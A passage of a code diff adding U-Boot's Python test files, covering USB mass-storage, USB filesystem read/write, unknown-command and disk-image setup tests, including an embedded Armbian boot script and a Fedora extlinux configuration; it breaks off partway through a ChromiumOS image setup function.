mount_subdir = env__block_devs[0]['writable_fs_subdir'] + part_num = env__block_devs[0]['writable_fs_partition'] + host_ums_part_node = '%s-part%d' % (host_ums_dev_node, part_num) + else: + host_ums_part_node = host_ums_dev_node + + test_f = u_boot_utils.PersistentRandomFile(u_boot_console, 'ums.bin', + 1024 * 1024); + if have_writable_fs_partition: + mounted_test_fn = mount_point + '/' + mount_subdir + test_f.fn + + def start_ums(): + """Start U-Boot's ums shell command. + + This also waits for the host-side USB enumeration process to complete. + + Args: + None. + + Returns: + Nothing. + """ + + u_boot_console.log.action( + 'Starting long-running U-Boot ums shell command') + cmd = 'ums %s %s %s' % (tgt_usb_ctlr, tgt_dev_type, tgt_dev_id) + u_boot_console.run_command(cmd, wait_for_prompt=False) + u_boot_console.wait_for(re.compile('UMS: LUN.*[\r\n]')) + fh = u_boot_utils.wait_until_open_succeeds(host_ums_part_node) + u_boot_console.log.action('Reading raw data from UMS device') + fh.read(4096) + fh.close() + + def mount(): + """Mount the block device that U-Boot exports. + + Args: + None. + + Returns: + Nothing. + """ + + u_boot_console.log.action('Mounting exported UMS device') + cmd = ('/bin/mount', host_ums_part_node) + u_boot_utils.run_and_log(u_boot_console, cmd) + + def umount(ignore_errors): + """Unmount the block device that U-Boot exports. + + Args: + ignore_errors: Ignore any errors. This is useful if an error has + already been detected, and the code is performing best-effort + cleanup. In this case, we do not want to mask the original + error by "honoring" any new errors. + + Returns: + Nothing. + """ + + u_boot_console.log.action('Unmounting UMS device') + cmd = ('/bin/umount', host_ums_part_node) + u_boot_utils.run_and_log(u_boot_console, cmd, ignore_errors) + + def stop_ums(ignore_errors): + """Stop U-Boot's ums shell command from executing. + + This also waits for the host-side USB de-enumeration process to + complete. + + Args: + ignore_errors: Ignore any errors. This is useful if an error has + already been detected, and the code is performing best-effort + cleanup. In this case, we do not want to mask the original + error by "honoring" any new errors. + + Returns: + Nothing. + """ + + u_boot_console.log.action( + 'Stopping long-running U-Boot ums shell command') + u_boot_console.ctrlc() + u_boot_utils.wait_until_file_open_fails(host_ums_part_node, + ignore_errors) + + ignore_cleanup_errors = True + try: + start_ums() + if not have_writable_fs_partition: + # Skip filesystem-based testing if not configured + return + try: + mount() + u_boot_console.log.action('Writing test file via UMS') + cmd = ('rm', '-f', mounted_test_fn) + u_boot_utils.run_and_log(u_boot_console, cmd) + if os.path.exists(mounted_test_fn): + raise Exception('Could not rm target UMS test file') + cmd = ('cp', test_f.abs_fn, mounted_test_fn) + u_boot_utils.run_and_log(u_boot_console, cmd) + ignore_cleanup_errors = False + finally: + umount(ignore_errors=ignore_cleanup_errors) + finally: + stop_ums(ignore_errors=ignore_cleanup_errors) + + ignore_cleanup_errors = True + try: + start_ums() + try: + mount() + u_boot_console.log.action('Reading test file back via UMS') + read_back_hash = u_boot_utils.md5sum_file(mounted_test_fn) + cmd = ('rm', '-f', mounted_test_fn) + u_boot_utils.run_and_log(u_boot_console, cmd) + ignore_cleanup_errors = False + finally: + umount(ignore_errors=ignore_cleanup_errors) + finally: + stop_ums(ignore_errors=ignore_cleanup_errors) + + written_hash = test_f.content_hash + assert(written_hash == read_back_hash) diff --git a/test/py/tests/test_unknown_cmd.py b/test/py/tests/test_unknown_cmd.py new file mode 100644 index 00000000000..8fc284a9249 --- /dev/null +++ b/test/py/tests/test_unknown_cmd.py @@ -0,0 +1,13 @@ +# SPDX-License-Identifier: GPL-2.0 +# Copyright (c) 2015 Stephen Warren +# Copyright (c) 2016, NVIDIA CORPORATION. All rights reserved. + +def test_unknown_command(u_boot_console): + """Test that executing an unknown command causes U-Boot to print an + error.""" + + # The "unknown command" error is actively expected here, + # so error detection for it is disabled. + with u_boot_console.disable_check('unknown_command'): + response = u_boot_console.run_command('non_existent_cmd') + assert('Unknown command \'non_existent_cmd\' - try \'help\'' in response) diff --git a/test/py/tests/test_usb.py b/test/py/tests/test_usb.py new file mode 100644 index 00000000000..fb3d20f0826 --- /dev/null +++ b/test/py/tests/test_usb.py @@ -0,0 +1,626 @@ +# SPDX-License-Identifier: GPL-2.0 +# (C) Copyright 2023, Advanced Micro Devices, Inc. + +import pytest +import random +import re +import u_boot_utils + +""" +Note: This test doesn't rely on boardenv_* configuration values but it can +change the test behavior. To test USB file system cases (fat32, ext2, ext4), +USB device should be formatted and valid partitions should be created for +different file system, otherwise it may leads to failure. This test will be +skipped if the USB device is not detected. + +For example: + +# Setup env__usb_device_test_skip to not skipping the test. By default, its +# value is set to True. Set it to False to run all tests for USB device. +env__usb_device_test_skip = False +""" + +def setup_usb(u_boot_console): + if u_boot_console.config.env.get('env__usb_device_test_skip', True): + pytest.skip('USB device test is not enabled') + +@pytest.mark.buildconfigspec('cmd_usb') +def test_usb_start(u_boot_console): + setup_usb(u_boot_console) + output = u_boot_console.run_command('usb start') + + # if output is empty, usb start may already run as part of preboot command + # re-start the usb, in that case + if not output: + u_boot_console.run_command('usb stop') + output = u_boot_console.run_command('usb start') + + if 'No USB device found' in output: + pytest.skip('No USB controller available') + + if 'Card did not respond to voltage select' in output: + pytest.skip('No USB device present') + + controllers = 0 + storage_device = 0 + obj = re.search(r'\d USB Device\(s\) found', output) + controllers = int(obj.group()[0]) + + if not controllers: + pytest.skip('No USB device present') + + obj = re.search(r'\d Storage Device\(s\) found', output) + storage_device = int(obj.group()[0]) + + if not storage_device: + pytest.skip('No USB storage device present') + + assert 'USB init failed' not in output + assert 'starting USB...' in output + + if 'Starting the controller' in output: + assert 'USB XHCI' in output + + output = u_boot_console.run_command('echo $?') + assert output.endswith('0') + return controllers, storage_device + +@pytest.mark.buildconfigspec('cmd_usb') +def test_usb_stop(u_boot_console): + setup_usb(u_boot_console) + output = u_boot_console.run_command('usb stop') + assert 'stopping USB..' in output + + output = u_boot_console.run_command('echo $?') + assert output.endswith('0') + + output = u_boot_console.run_command('usb dev') + assert "USB is stopped. Please issue 'usb start' first." in output + +@pytest.mark.buildconfigspec('cmd_usb') +def test_usb_reset(u_boot_console): + setup_usb(u_boot_console) + output = u_boot_console.run_command('usb reset') + + if 'No USB device found' in output: + pytest.skip('No USB controller available') + + if 'Card did not respond to voltage select' in output: + pytest.skip('No USB device present') + + obj = re.search(r'\d USB Device\(s\) found', output) + usb_dev_num = int(obj.group()[0]) + + if not usb_dev_num: + pytest.skip('No USB device present') + + obj = re.search(r'\d Storage Device\(s\) found', output) + usb_stor_num = int(obj.group()[0]) + + if not usb_stor_num: + pytest.skip('No USB storage device present') + + assert 'BUG' not in output + assert 'USB init failed' not in output + assert 'resetting USB...' in output + + if 'Starting the controller' in output: + assert 'USB XHCI' in output + + output = u_boot_console.run_command('echo $?') + assert output.endswith('0') + +@pytest.mark.buildconfigspec('cmd_usb') +def test_usb_info(u_boot_console): + controllers, storage_device = test_usb_start(u_boot_console) + output = u_boot_console.run_command('usb info') + + num_controller = len(re.findall(': Hub,', output)) + num_mass_storage = len(re.findall(': Mass Storage,', output)) + + assert num_controller == controllers - 1 + assert num_mass_storage == storage_device + + output = u_boot_console.run_command('echo $?') + assert output.endswith('0') + + for i in range(0, storage_device + controllers - 1): + output = u_boot_console.run_command('usb info %d' % i) + num_controller = len(re.findall(': Hub,', output)) + num_mass_storage = len(re.findall(': Mass Storage,', output)) + assert num_controller + num_mass_storage == 1 + assert 'No device available' not in output + output = u_boot_console.run_command('echo $?') + assert output.endswith('0') + +@pytest.mark.buildconfigspec('cmd_usb') +def test_usb_tree(u_boot_console): + controllers, storage_device = test_usb_start(u_boot_console) + output = u_boot_console.run_command('usb tree') + + num_controller = len(re.findall('Hub', output)) + num_mass_storage = len(re.findall('Mass Storage', output)) + + assert num_controller == controllers - 1 + assert num_mass_storage == storage_device + + output = u_boot_console.run_command('echo $?') + assert output.endswith('0') + +@pytest.mark.buildconfigspec('cmd_usb') +@pytest.mark.buildconfigspec('usb_storage') +def test_usb_storage(u_boot_console): + controllers, storage_device = test_usb_start(u_boot_console) + output = u_boot_console.run_command('usb storage') + + obj = re.findall(r'Capacity: (\d+|\d+[\.]?\d)', output) + devices = {} + + for key in range(int(storage_device)): + devices[key] = {} + + for x in range(int(storage_device)): + try: + capacity = float(obj[x].split()[0]) + devices[x]['capacity'] = capacity + print('USB storage device %d capacity is: %g MB' % (x, capacity)) + except ValueError: + pytest.fail('USB storage device capacity not recognized') + + output = u_boot_console.run_command('echo $?') + assert output.endswith('0') + +@pytest.mark.buildconfigspec('cmd_usb') +def test_usb_dev(u_boot_console): + controllers, storage_device = test_usb_start(u_boot_console) + output = u_boot_console.run_command('usb dev') + + assert 'no usb devices available' not in output + + output = u_boot_console.run_command('echo $?') + assert output.endswith('0') + + devices = {} + + for key in range(int(storage_device)): + devices[key] = {} + + fail = 0 + for x in range(0, storage_device): + devices[x]['detected'] = 'yes' + output = u_boot_console.run_command('usb dev %d' % x) + + if 'Card did not respond to voltage select' in output: + fail = 1 + devices[x]['detected'] = 'no' + + if 'No USB device found' in output: + devices[x]['detected'] = 'no' + + if 'unknown device' in output: + devices[x]['detected'] = 'no' + + assert 'is now current device' in output + output = u_boot_console.run_command('echo $?') + assert output.endswith('0') + + if fail: + pytest.fail('USB device not present') + + return devices, controllers, storage_device + +@pytest.mark.buildconfigspec('cmd_usb') +def test_usb_part(u_boot_console): + devices, controllers, storage_device = test_usb_dev(u_boot_console) + if not devices: + pytest.skip('No devices detected') + + u_boot_console.run_command('usb part') + + output = u_boot_console.run_command('echo $?') + assert output.endswith('0') + + for i in range(0, storage_device): + if devices[i]['detected'] == 'yes': + u_boot_console.run_command('usb dev %d' % i) + output = u_boot_console.run_command('usb part') + + lines = output.split('\n') + part_fat = [] + part_ext = [] + for line in lines: + obj = re.search(r'(\d)\s+\d+\s+\d+\s+\w+\d+\w+-\d+\s+(\d+\w+)', line) + if obj: + part_id = int(obj.groups()[0]) + part_type = obj.groups()[1] + print('part_id:%d, part_type:%s' % (part_id, part_type)) + + if part_type == '0c' or part_type == '0b' or part_type == '0e': + print('Fat detected') + part_fat.append(part_id) + elif part_type == '83': + print('ext detected') + part_ext.append(part_id) + else: + pytest.fail('Unsupported Filesystem on device %d' % i) + devices[i]['ext4'] = part_ext + devices[i]['ext2'] = part_ext + devices[i]['fat'] = part_fat + + if not part_ext and not part_fat: + pytest.fail('No partition detected on device %d' % i) + + return devices, controllers, storage_device + +@pytest.mark.buildconfigspec('cmd_usb') +@pytest.mark.buildconfigspec('cmd_fat') +def test_usb_fatls_fatinfo(u_boot_console): + devices, controllers, storage_device = test_usb_part(u_boot_console) + if not devices: + pytest.skip('No devices detected') + + part_detect = 0 + fs = 'fat' + for x in range(0, int(storage_device)): + if devices[x]['detected'] == 'yes': + u_boot_console.run_command('usb dev %d' % x) + try: + partitions = devices[x][fs] + except: + print('No %s table on this device' % fs.upper()) + continue + + for part in partitions: + output = u_boot_console.run_command('fatls usb %d:%s' % (x, part)) + if 'Unrecognized filesystem type' in output: + partitions.remove(part) + pytest.fail('Unrecognized filesystem') + + if not re.search(r'\d file\(s\), \d dir\(s\)', output): + pytest.fail('%s read failed on device %d' % (fs.upper, x)) + + output = u_boot_console.run_command('fatinfo usb %d:%s' % (x, part)) + string = 'Filesystem: %s' % fs.upper + if re.search(string, output): + pytest.fail('%s FS failed on device %d' % (fs.upper(), x)) + part_detect = 1 + + if not part_detect: + pytest.skip('No %s partition detected' % fs.upper()) + +@pytest.mark.buildconfigspec('cmd_usb') +@pytest.mark.buildconfigspec('cmd_fat') +@pytest.mark.buildconfigspec('cmd_memory') +def test_usb_fatload_fatwrite(u_boot_console): + devices, controllers, storage_device = test_usb_part(u_boot_console) + if not devices: + pytest.skip('No devices detected') + + part_detect = 0 + fs = 'fat' + for x in range(0, int(storage_device)): + if devices[x]['detected'] == 'yes': + u_boot_console.run_command('usb dev %d' % x) + try: + partitions = devices[x][fs] + except: + print('No %s table on this device' % fs.upper()) + continue + + for part in partitions: + part_detect = 1 + addr = u_boot_utils.find_ram_base(u_boot_console) + size = random.randint(4, 1 * 1024 * 1024) + output = u_boot_console.run_command('crc32 %x %x' % (addr, size)) + m = re.search('==> (.+?)', output) + if not m: + pytest.fail('CRC32 failed') + expected_crc32 = m.group(1) + + file = '%s_%d' % ('uboot_test', size) + output = u_boot_console.run_command( + '%swrite usb %d:%s %x %s %x' % (fs, x, part, addr, file, size) + ) + assert 'Unable to write' not in output + assert 'Error' not in output + assert 'overflow' not in output + expected_text = '%d bytes written' % size + assert expected_text in output + + alignment = int( + u_boot_console.config.buildconfig.get( + 'config_sys_cacheline_size', 128 + ) + ) + offset = random.randrange(alignment, 1024, alignment) + output = u_boot_console.run_command( + '%sload usb %d:%s %x %s' % (fs, x, part, addr + offset, file) + ) + assert 'Invalid FAT entry' not in output + assert 'Unable to read file' not in output + assert 'Misaligned buffer address' not in output + expected_text = '%d bytes read' % size + assert expected_text in output + + output = u_boot_console.run_command( + 'crc32 %x $filesize' % (addr + offset) + ) + assert expected_crc32 in output + + if not part_detect: + pytest.skip('No %s partition detected' % fs.upper()) + + return file, size + +@pytest.mark.buildconfigspec('cmd_usb') +@pytest.mark.buildconfigspec('cmd_ext4') +def test_usb_ext4ls(u_boot_console): + devices, controllers, storage_device = test_usb_part(u_boot_console) + if not devices: + pytest.skip('No devices detected') + + part_detect = 0 + fs = 'ext4' + for x in range(0, int(storage_device)): + if devices[x]['detected'] == 'yes': + try: + partitions = devices[x][fs] + except: + print('No %s table on this device' % fs.upper()) + continue + + u_boot_console.run_command('usb dev %d' % x) + for part in partitions: + output = u_boot_console.run_command('%sls usb %d:%s' % (fs, x, part)) + if 'Unrecognized filesystem type' in output: + partitions.remove(part) + pytest.fail('Unrecognized filesystem') + part_detect = 1 + + if not part_detect: + pytest.skip('No %s partition detected' % fs.upper()) + +@pytest.mark.buildconfigspec('cmd_usb') +@pytest.mark.buildconfigspec('cmd_ext4') +@pytest.mark.buildconfigspec('ext4_write') +@pytest.mark.buildconfigspec('cmd_memory') +def test_usb_ext4load_ext4write(u_boot_console): + devices, controllers, storage_device = test_usb_part(u_boot_console) + if not devices: + pytest.skip('No devices detected') + + part_detect = 0 + fs = 'ext4' + for x in range(0, int(storage_device)): + if devices[x]['detected'] == 'yes': + u_boot_console.run_command('usb dev %d' % x) + try: + partitions = devices[x][fs] + except: + print('No %s table on this device' % fs.upper()) + continue + + for part in partitions: + part_detect = 1 + addr = u_boot_utils.find_ram_base(u_boot_console) + size = random.randint(4, 1 * 1024 * 1024) + output = u_boot_console.run_command('crc32 %x %x' % (addr, size)) + m = re.search('==> (.+?)', output) + if not m: + pytest.fail('CRC32 failed') + expected_crc32 = m.group(1) + file = '%s_%d' % ('uboot_test', size) + + output = u_boot_console.run_command( + '%swrite usb %d:%s %x /%s %x' % (fs, x, part, addr, file, size) + ) + assert 'Unable to write' not in output + assert 'Error' not in output + assert 'overflow' not in output + expected_text = '%d bytes written' % size + assert expected_text in output + + offset = random.randrange(128, 1024, 128) + output = u_boot_console.run_command( + '%sload usb %d:%s %x /%s' % (fs, x, part, addr + offset, file) + ) + expected_text = '%d bytes read' % size + assert expected_text in output + + output = u_boot_console.run_command( + 'crc32 %x $filesize' % (addr + offset) + ) + assert expected_crc32 in output + + if not part_detect: + pytest.skip('No %s partition detected' % fs.upper()) + + return file, size + +@pytest.mark.buildconfigspec('cmd_usb') +@pytest.mark.buildconfigspec('cmd_ext2') +def test_usb_ext2ls(u_boot_console): + devices, controllers, storage_device = test_usb_part(u_boot_console) + if not devices: + pytest.skip('No devices detected') + + part_detect = 0 + fs = 'ext2' + for x in range(0, int(storage_device)): + if devices[x]['detected'] == 'yes': + u_boot_console.run_command('usb dev %d' % x) + try: + partitions = devices[x][fs] + except: + print('No %s table on this device' % fs.upper()) + continue + + for part in partitions: + part_detect = 1 + output = u_boot_console.run_command('%sls usb %d:%s' % (fs, x, part)) + if 'Unrecognized filesystem type' in output: + partitions.remove(part) + pytest.fail('Unrecognized filesystem') + part_detect = 1 + + if not part_detect: + pytest.skip('No %s partition detected' % fs.upper()) + +@pytest.mark.buildconfigspec('cmd_usb') +@pytest.mark.buildconfigspec('cmd_ext2') +@pytest.mark.buildconfigspec('cmd_ext4') +@pytest.mark.buildconfigspec('ext4_write') +@pytest.mark.buildconfigspec('cmd_memory') +def test_usb_ext2load(u_boot_console): + devices, controllers, storage_device = test_usb_part(u_boot_console) + file, size = test_usb_ext4load_ext4write(u_boot_console) + + if not devices: + pytest.skip('No devices detected') + + part_detect = 0 + fs = 'ext2' + for x in range(0, int(storage_device)): + if devices[x]['detected'] == 'yes': + u_boot_console.run_command('usb dev %d' % x) + try: + partitions = devices[x][fs] + except: + print('No %s table on this device' % fs.upper()) + continue + + for part in partitions: + part_detect = 1 + addr = u_boot_utils.find_ram_base(u_boot_console) + output = u_boot_console.run_command('crc32 %x %x' % (addr, size)) + m = re.search('==> (.+?)', output) + if not m: + pytest.fail('CRC32 failed') + expected_crc32 = m.group(1) + + offset = random.randrange(128, 1024, 128) + output = u_boot_console.run_command( + '%sload usb %d:%s %x /%s' % (fs, x, part, addr + offset, file) + ) + expected_text = '%d bytes read' % size + assert expected_text in output + + output = u_boot_console.run_command( + 'crc32 %x $filesize' % (addr + offset) + ) + assert expected_crc32 in output + + if not part_detect: + pytest.skip('No %s partition detected' % fs.upper()) + +@pytest.mark.buildconfigspec('cmd_usb') +@pytest.mark.buildconfigspec('cmd_fs_generic') +def test_usb_ls(u_boot_console): + devices, controllers, storage_device = test_usb_part(u_boot_console) + if not devices: + pytest.skip('No devices detected') + + part_detect = 0 + for x in range(0, int(storage_device)): + if devices[x]['detected'] == 'yes': + u_boot_console.run_command('usb dev %d' % x) + for fs in ['fat', 'ext4']: + try: + partitions = devices[x][fs] + except: + print('No %s table on this device' % fs.upper()) + continue + + for part in partitions: + part_detect = 1 + output = u_boot_console.run_command('ls usb %d:%s' % (x, part)) + if re.search(r'No \w+ table on this device', output): + pytest.fail( + '%s: Partition table not found %d' % (fs.upper(), x) + ) + + if not part_detect: + pytest.skip('No partition detected') + +@pytest.mark.buildconfigspec('cmd_usb') +@pytest.mark.buildconfigspec('cmd_fs_generic') +def test_usb_load(u_boot_console): + devices, controllers, storage_device = test_usb_part(u_boot_console) + if not devices: + pytest.skip('No devices detected') + + part_detect = 0 + for x in range(0, int(storage_device)): + if devices[x]['detected'] == 'yes': + u_boot_console.run_command('usb dev %d' % x) + for fs in ['fat', 'ext4']: + try: + partitions = devices[x][fs] + except: + print('No %s table on this device' % fs.upper()) + continue + + for part in partitions: + part_detect = 1 + addr = u_boot_utils.find_ram_base(u_boot_console) + + if fs == 'fat': + file, size = test_usb_fatload_fatwrite(u_boot_console) + elif fs == 'ext4': + file, size = test_usb_ext4load_ext4write(u_boot_console) + + output = u_boot_console.run_command('crc32 %x %x' % (addr, size)) + m = re.search('==> (.+?)', output) + if not m: + pytest.fail('CRC32 failed') + expected_crc32 = m.group(1) + + offset = random.randrange(128, 1024, 128) + output = u_boot_console.run_command( + 'load usb %d:%s %x /%s' % (x, part, addr + offset, file) + ) + expected_text = '%d bytes read' % size + assert expected_text in output + + output = u_boot_console.run_command( + 'crc32 %x $filesize' % (addr + offset) + ) + assert expected_crc32 in output + + if not part_detect: + pytest.skip('No partition detected') + +@pytest.mark.buildconfigspec('cmd_usb') +@pytest.mark.buildconfigspec('cmd_fs_generic') +def test_usb_save(u_boot_console): + devices, controllers, storage_device = test_usb_part(u_boot_console) + if not devices: + pytest.skip('No devices detected') + + part_detect = 0 + for x in range(0, int(storage_device)): + if devices[x]['detected'] == 'yes': + u_boot_console.run_command('usb dev %d' % x) + for fs in ['fat', 'ext4']: + try: + partitions = devices[x][fs] + except: + print('No %s table on this device' % fs.upper()) + continue + + for part in partitions: + part_detect = 1 + addr = u_boot_utils.find_ram_base(u_boot_console) + size = random.randint(4, 1 * 1024 * 1024) + file = '%s_%d' % ('uboot_test', size) + + offset = random.randrange(128, 1024, 128) + output = u_boot_console.run_command( + 'save usb %d:%s %x /%s %x' + % (x, part, addr + offset, file, size) + ) + expected_text = '%d bytes written' % size + assert expected_text in output + + if not part_detect: + pytest.skip('No partition detected') diff --git a/test/py/tests/test_ut.py b/test/py/tests/test_ut.py new file mode 100644 index 00000000000..c169c835e38 --- /dev/null +++ b/test/py/tests/test_ut.py @@ -0,0 +1,510 @@ +# SPDX-License-Identifier: GPL-2.0 +# Copyright (c) 2016, NVIDIA CORPORATION. All rights reserved. + +import collections +import getpass +import gzip +import os +import os.path +import pytest + +import u_boot_utils +# pylint: disable=E0611 +from tests import fs_helper + +def mkdir_cond(dirname): + """Create a directory if it doesn't already exist + + Args: + dirname (str): Name of directory to create + """ + if not os.path.exists(dirname): + os.mkdir(dirname) + +def setup_image(cons, mmc_dev, part_type, second_part=False): + """Create a 20MB disk image with a single partition + + Args: + cons (ConsoleBase): Console to use + mmc_dev (int): MMC device number to use, e.g. 1 + part_type (int): Partition type, e.g. 0xc for FAT32 + second_part (bool): True to contain a small second partition + + Returns: + tuple: + str: Filename of MMC image + str: Directory name of 'mnt' directory + """ + fname = os.path.join(cons.config.source_dir, f'mmc{mmc_dev}.img') + mnt = os.path.join(cons.config.persistent_data_dir, 'mnt') + mkdir_cond(mnt) + + spec = f'type={part_type:x}, size=18M, bootable' + if second_part: + spec += '\ntype=c' + + u_boot_utils.run_and_log(cons, 'qemu-img create %s 20M' % fname) + u_boot_utils.run_and_log(cons, 'sudo sfdisk %s' % fname, + stdin=spec.encode('utf-8')) + return fname, mnt + +def mount_image(cons, fname, mnt, fstype): + """Create a filesystem and mount it on partition 1 + + Args: + cons (ConsoleBase): Console to use + fname (str): Filename of MMC image + mnt (str): Directory name of 'mnt' directory + fstype (str): Filesystem type ('vfat' or 'ext4') + + Returns: + str: Name of loop device used + """ + out = u_boot_utils.run_and_log(cons, 'sudo losetup --show -f -P %s' % fname) + loop = out.strip() + part = f'{loop}p1' + u_boot_utils.run_and_log(cons, f'sudo mkfs.{fstype} {part}') + opts = '' + if fstype == 'vfat': + opts += f' -o uid={os.getuid()},gid={os.getgid()}' + u_boot_utils.run_and_log(cons, f'sudo mount -o loop {part} {mnt}{opts}') + u_boot_utils.run_and_log(cons, f'sudo chown {getpass.getuser()} {mnt}') + return loop + +def copy_prepared_image(cons, mmc_dev, fname): + """Use a prepared image since we cannot create one + + Args: + cons (ConsoleBase): Console touse + mmc_dev (int): MMC device number + fname (str): Filename of MMC image + """ + infname = os.path.join(cons.config.source_dir, + f'test/py/tests/bootstd/mmc{mmc_dev}.img.xz') + u_boot_utils.run_and_log( + cons, + ['sh', '-c', 'xz -dc %s >%s' % (infname, fname)]) + +def setup_bootmenu_image(cons): + """Create a 20MB disk image with a single ext4 partition + + This is modelled on Armbian 22.08 Jammy + """ + mmc_dev = 4 + fname, mnt = setup_image(cons, mmc_dev, 0x83) + + loop = None + mounted = False + complete = False + try: + loop = mount_image(cons, fname, mnt, 'ext4') + mounted = True + + vmlinux = 'Image' + initrd = 'uInitrd' + dtbdir = 'dtb' + script = '''# DO NOT EDIT THIS FILE +# +# Please edit /boot/armbianEnv.txt to set supported parameters +# + +setenv load_addr "0x9000000" +setenv overlay_error "false" +# default values +setenv rootdev "/dev/mmcblk%dp1" +setenv verbosity "1" +setenv console "both" +setenv bootlogo "false" +setenv rootfstype "ext4" +setenv docker_optimizations "on" +setenv earlycon "off" + +echo "Boot script loaded from ${devtype} ${devnum}" + +if test -e ${devtype} ${devnum} ${prefix}armbianEnv.txt; then + load ${devtype} ${devnum} ${load_addr} ${prefix}armbianEnv.txt + env import -t ${load_addr} ${filesize} +fi + +if test "${logo}" = "disabled"; then setenv logo "logo.nologo"; fi + +if test "${console}" = "display" || test "${console}" = "both"; then setenv consoleargs "console=tty1"; fi +if test "${console}" = "serial" || test "${console}" = "both"; then setenv consoleargs "console=ttyS2,1500000 ${consoleargs}"; fi +if test "${earlycon}" = "on"; then setenv consoleargs "earlycon ${consoleargs}"; fi +if test "${bootlogo}" = "true"; then setenv consoleargs "bootsplash.bootfile=bootsplash.armbian ${consoleargs}"; fi + +# get PARTUUID of first partition on SD/eMMC the boot script was loaded from +if test "${devtype}" = "mmc"; then part uuid mmc ${devnum}:1 partuuid; fi + +setenv bootargs "root=${rootdev} rootwait rootfstype=${rootfstype} ${consoleargs} consoleblank=0 loglevel=${verbosity} ubootpart=${partuuid} usb-storage.quirks=${usbstoragequirks} ${extraargs} ${extraboardargs}" + +if test "${docker_optimizations}" = "on"; then setenv bootargs "${bootargs} cgroup_enable=cpuset cgroup_memory=1 cgroup_enable=memory swapaccount=1"; fi + +load ${devtype} ${devnum} ${ramdisk_addr_r} ${prefix}uInitrd +load ${devtype} ${devnum} ${kernel_addr_r} ${prefix}Image + +load ${devtype} ${devnum} ${fdt_addr_r} ${prefix}dtb/${fdtfile} +fdt addr ${fdt_addr_r} +fdt resize 65536 +for overlay_file in ${overlays}; do + if load ${devtype} ${devnum} ${load_addr} ${prefix}dtb/rockchip/overlay/${overlay_prefix}-${overlay_file}.dtbo; then + echo "Applying kernel provided DT overlay ${overlay_prefix}-${overlay_file}.dtbo" + fdt apply ${load_addr} || setenv overlay_error "true" + fi +done +for overlay_file in ${user_overlays}; do + if load ${devtype} ${devnum} ${load_addr} ${prefix}overlay-user/${overlay_file}.dtbo; then + echo "Applying user provided DT overlay ${overlay_file}.dtbo" + fdt apply ${load_addr} || setenv overlay_error "true" + fi +done +if test "${overlay_error}" = "true"; then + echo "Error applying DT overlays, restoring original DT" + load ${devtype} ${devnum} ${fdt_addr_r} ${prefix}dtb/${fdtfile} +else + if load ${devtype} ${devnum} ${load_addr} ${prefix}dtb/rockchip/overlay/${overlay_prefix}-fixup.scr; then + echo "Applying kernel provided DT fixup script (${overlay_prefix}-fixup.scr)" + source ${load_addr} + fi + if test -e ${devtype} ${devnum} ${prefix}fixup.scr; then + load ${devtype} ${devnum} ${load_addr} ${prefix}fixup.scr + echo "Applying user provided fixup script (fixup.scr)" + source ${load_addr} + fi +fi +booti ${kernel_addr_r} ${ramdisk_addr_r} ${fdt_addr_r} + +# Recompile with: +# mkimage -C none -A arm -T script -d /boot/boot.cmd /boot/boot.scr +''' % (mmc_dev) + bootdir = os.path.join(mnt, 'boot') + mkdir_cond(bootdir) + cmd_fname = os.path.join(bootdir, 'boot.cmd') + scr_fname = os.path.join(bootdir, 'boot.scr') + with open(cmd_fname, 'w') as outf: + print(script, file=outf) + + infname = os.path.join(cons.config.source_dir, + 'test/py/tests/bootstd/armbian.bmp.xz') + bmp_file = os.path.join(bootdir, 'boot.bmp') + u_boot_utils.run_and_log( + cons, + ['sh', '-c', f'xz -dc {infname} >{bmp_file}']) + + u_boot_utils.run_and_log( + cons, f'mkimage -C none -A arm -T script -d {cmd_fname} {scr_fname}') + + kernel = 'vmlinuz-5.15.63-rockchip64' + target = os.path.join(bootdir, kernel) + with open(target, 'wb') as outf: + print('kernel', outf) + + symlink = os.path.join(bootdir, 'Image') + if os.path.exists(symlink): + os.remove(symlink) + u_boot_utils.run_and_log( + cons, f'echo here {kernel} {symlink}') + os.symlink(kernel, symlink) + + u_boot_utils.run_and_log( + cons, f'mkimage -C none -A arm -T script -d {cmd_fname} {scr_fname}') + complete = True + + except ValueError as exc: + print('Falled to create image, failing back to prepared copy: %s', + str(exc)) + finally: + if mounted: + u_boot_utils.run_and_log(cons, 'sudo umount --lazy %s' % mnt) + if loop: + u_boot_utils.run_and_log(cons, 'sudo losetup -d %s' % loop) + + if not complete: + copy_prepared_image(cons, mmc_dev, fname) + +def setup_bootflow_image(cons): + """Create a 20MB disk image with a single FAT partition""" + mmc_dev = 1 + fname, mnt = setup_image(cons, mmc_dev, 0xc, second_part=True) + + loop = None + mounted = False + complete = False + try: + loop = mount_image(cons, fname, mnt, 'vfat') + mounted = True + + vmlinux = 'vmlinuz-5.3.7-301.fc31.armv7hl' + initrd = 'initramfs-5.3.7-301.fc31.armv7hl.img' + dtbdir = 'dtb-5.3.7-301.fc31.armv7hl' + script = '''# extlinux.conf generated by appliance-creator +ui menu.c32 +menu autoboot Welcome to Fedora-Workstation-armhfp-31-1.9. Automatic boot in # second{,s}. Press a key for options. +menu title Fedora-Workstation-armhfp-31-1.9 Boot Options. +menu hidden +timeout 20 +totaltimeout 600 + +label Fedora-Workstation-armhfp-31-1.9 (5.3.7-301.fc31.armv7hl) + kernel /%s + append ro root=UUID=9732b35b-4cd5-458b-9b91-80f7047e0b8a rhgb quiet LANG=en_US.UTF-8 cma=192MB cma=256MB + fdtdir /%s/ + initrd /%s''' % (vmlinux, dtbdir, initrd) + ext = os.path.join(mnt, 'extlinux') + mkdir_cond(ext) + + with open(os.path.join(ext, 'extlinux.conf'), 'w') as fd: + print(script, file=fd) + + inf = os.path.join(cons.config.persistent_data_dir, 'inf') + with open(inf, 'wb') as fd: + fd.write(gzip.compress(b'vmlinux')) + u_boot_utils.run_and_log(cons, 'mkimage -f auto -d %s %s' % + (inf, os.path.join(mnt, vmlinux))) + + with open(os.path.join(mnt, initrd), 'w') as fd: + print('initrd', file=fd) + + mkdir_cond(os.path.join(mnt, dtbdir)) + + dtb_file = os.path.join(mnt, '%s/sandbox.dtb' % dtbdir) + u_boot_utils.run_and_log( + cons, 'dtc -o %s' % dtb_file, stdin=b'/dts-v1/; / {};') + complete = True + except ValueError as exc: + print('Falled to create image, failing back to prepared copy: %s', + str(exc)) + finally: + if mounted: + u_boot_utils.run_and_log(cons, 'sudo umount --lazy %s' % mnt) + if loop: + u_boot_utils.run_and_log(cons, 'sudo losetup -d %s' % loop) + + if not complete: + copy_prepared_image(cons, mmc_dev, fname) + + +def setup_cros_image(cons): + """Create a 20MB disk image with ChromiumOS partitions""" + Partition = collections.namedtuple('part', 'start,size,name') + parts = {} + disk_data = None + + def pack_kernel(cons, 